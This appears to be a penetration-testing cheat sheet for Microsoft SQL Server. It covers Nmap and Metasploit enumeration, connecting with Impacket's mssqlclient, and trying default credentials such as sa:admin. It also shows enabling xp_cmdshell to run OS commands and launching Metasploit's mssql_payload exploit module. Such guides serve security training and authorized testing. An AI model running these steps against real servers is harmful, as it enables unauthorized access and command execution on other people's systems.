Table of Contents

  1. Introduction to MSSQL
    1. Overview of MSSQL
    2. Default Databases
    3. Default Configuration
  2. Enumeration Techniques
    1. Service Discovery with Nmap
    2. Footprinting with Metasploit
  3. Advanced Techniques
    1. Using Impacket’s mssqlclient.py
    2. Enumerating MSSQL Databases
  4. Exploitation Scenarios
    1. Weak or Default Credentials
    2. Exploiting xp_cmdshell
  5. Combining Tools
    1. Integrating with Metasploit
    2. Automating MSSQL Attacks
  6. Glossary

Introduction to MSSQL

Overview of MSSQL

Microsoft SQL Server (MSSQL) is a relational database management system (RDBMS) developed by Microsoft. It is commonly used in enterprise environments, especially when paired with the .NET framework.

  • Platform Support: Initially Windows-only, now supports Linux and macOS.
  • Core Use: Data storage, retrieval, and manipulation for applications.

Default Databases

Database Description
master Tracks all system-level information for the SQL Server instance.
model Acts as a template for creating new databases.
msdb Used by SQL Server Agent to schedule jobs, alerts, and tasks.
tempdb Temporary database for storing intermediate results and temporary tables.
resource Read-only database containing system objects.

Default Configuration

  • Default Port: TCP 1433.
  • Authentication: Often set to Windows Authentication, leveraging Active Directory for credentials.
  • Encryption: Not enforced by default.

Common Configurations:

Service Name: MSSQLSERVER
Authentication: Windows Auth or Mixed Mode
Encryption: Optional, often self-signed certificates

Enumeration Techniques

Service Discovery with Nmap

Identify MSSQL services and gather version information.

Command:

nmap -p1433 --script ms-sql-info,ms-sql-empty-password TARGET_IP

Example Output:

PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2019 15.00.2000.00
| ms-sql-info: 
|   Hostname: SQL-01
|   Instance: MSSQLSERVER
|   Version: Microsoft SQL Server 2019

Footprinting with Metasploit

Leverage Metasploit’s auxiliary modules for MSSQL reconnaissance.

Command:

use auxiliary/scanner/mssql/mssql_ping
set RHOSTS TARGET_IP
run

Example Output:

[+] ServerName: SQL-01
[+] Instance: MSSQLSERVER
[+] Version: Microsoft SQL Server 2019
[+] TCP Port: 1433

Advanced Techniques

Using Impacket’s mssqlclient.py

SecureAuth’s mssqlclient.py is a powerful tool for connecting to MSSQL instances.

Command:

python3 mssqlclient.py Administrator@TARGET_IP -windows-auth

Example Interaction:

SQL> SELECT name FROM sys.databases;
master
tempdb
model
msdb

Enumerating MSSQL Databases

Once connected, enumerate available databases and their contents.

Commands:

  • List databases:

      SELECT name FROM sys.databases;

  • Switch to a database:

      USE database_name;

  • View tables:

      SELECT * FROM INFORMATION_SCHEMA.TABLES;

Exploitation Scenarios

Weak or Default Credentials

Test commonly used or default credentials, such as:

  • sa:admin
  • admin:password123

Command:

mssqlclient.py sa@TARGET_IP

Exploiting xp_cmdshell

Enable and execute commands using xp_cmdshell.

Enable xp_cmdshell:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Execute Command:

EXEC xp_cmdshell 'whoami';

Combining Tools

Integrating with Metasploit

Command:

use exploit/windows/mssql/mssql_payload
set RHOST TARGET_IP
set USERNAME sa
set PASSWORD password123
run

Automating MSSQL Attacks

Automate common tasks with scripts or tools like PowerShell.

PowerShell Example:

Invoke-Sqlcmd -ServerInstance TARGET_IP -Query "SELECT name FROM sys.databases;"

Glossary

Term Description
MSSQL Microsoft SQL Server, a relational database management system.
xp_cmdshell Extended stored procedure for executing OS-level commands.
Information Schema Metadata storage for database objects.
Named Pipes IPC mechanism for communication between processes.
Impacket Collection of Python scripts for network protocol interaction.